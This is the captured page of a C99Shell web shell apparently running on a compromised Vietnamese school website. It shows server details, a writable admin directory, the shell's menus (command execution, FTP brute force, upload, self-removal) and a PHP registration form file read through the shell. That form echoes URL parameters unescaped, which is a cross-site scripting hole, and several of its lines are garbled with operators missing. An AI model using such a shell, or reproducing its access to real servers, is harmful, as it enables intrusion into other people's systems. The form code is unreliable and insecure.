!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Microsoft-IIS/10.0. PHP/7.4.33 

uname -a: Windows NT LAKE 10.0 build 20348 (Windows Server 2016) AMD64 

IWPD_801(traduongco) 

Safe-mode: OFF (not secure)

E:\thcsltv.edu.vn\httpdocs\admin\modules\mod_category\   drwxrwxrwx
Free 224.42 GB of 400 GB (56.11%)
Detected drives: [ a ] [ c ] [ d ] [ e ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     form_register.php (3.22 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php  $ap = new app;    $h '35';     $ap->get_('data');   $db = new data; echo '<div class="head">ĐĂNG KÝ CHUYÊN MỤC CỦA MÔ ĐUN</div>';
       
$ago    ='index.php?module='.$_GET['module'];     $action =$ago.'&amp;task='.$_GET['task'].'&amp;register=register'
       
$sql 'SELECT * FROM '.$db->db_module.' LIMIT 0, 30 ';  $result mysql_query($sql$db->conn);       
?>
    <Form name="input" action="<?php echo $action;?>" method="post">
    <Table border="0"cellspacing="3" align="center">
        <tr height="<?php echo $h;?>"> <td>Chọn tên mô đun </td><td ><select class="f_input" name="code_mod">
          <?php while($r mysql_fetch_array($result)) {?>
          <option value="<?php echo $r[code_mod];?>"><?php echo $r[name_mod];?> </option> <?php ?> </select></td></tr>
        <tr height="<?php echo $h;?>"> <td>Chuyên mục mô đun </td><td><input class="f_input" type="text" name="item" required/> </td></tr>
        <tr height="<?php echo $h;?>"> <td>Link xuất bản</td><td><textarea class="f_input" name="scr" /></textarea></td></tr>
        <tr height="<?php echo $h;?>"> <td>Link cập nhật</td><td><textarea class="f_input" name="link_up"/></textarea></td></tr>
        <tr height="<?php echo $h;?>"> <td>Chú thích cho chuyên mục</td><td><textarea class="f_input" name="item_note" ></textarea></td></tr>
        <tr height="<?php echo $h;?>"> <td>Trạng thái chuyên mục</td><td> <select class="f_input" name="item_status">
                                                                     <option value="lock">Khóa</option>
                                                                     <option value="nolock">Không khóa</option>
                                                                     </select></td></tr>
        <tr height="<?php echo $h;?>"> <td>Quyền truy cập chuyên mục</td><td> <select class="f_input" name="item_access">
                                                                     <option value="teacher">Giáo viên</option>
                                                                     <option value="groupleader">Tổ trưởng CM</option>
                                                                     <option value="manager">Cán bộ quản lý</option>
                                                                     <option value="admin">Quản trị hệ thống </option>
                                                                     </select></td></tr>
        <tr height="<?php echo $h;?>"> <td>T.báo khi chuyên mục mở</td><td><textarea class="f_input" name="msg_on"/></textarea></td></tr>
        <tr height="<?php echo $h;?>"> <td>T.báo khi chuyên mục khóa</td><td><textarea class="f_input" name="msg_of"/></textarea></td></tr>                                                             
    </Table><br>
    <Table border="0"cellspacing="1" align="center">
       <tr><td width="80">
       <input type="hidden" name="table" value="<?php echo $_GET['module']; ?>"/>
       <input type="hidden" name="token" value="<?php echo $ago.'&amp;task='.$_GET['task']; ?>"/>
       <input type="hidden" name="ago" value="<?php echo $ago?>"/>
       <input type="submit" value="Đăng ký"/></td><td width="80"><input type="reset" value="Nhập lại"/> </td></tr>
    </Table></Form>
<?php echo '<div align = "center"><a href="javascript:history.go(-1)"><img src="'.$ap->local.'images/back.png" title="Trở về trang chuyên mục mô đun"/></a></div>'?>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.8217 ]--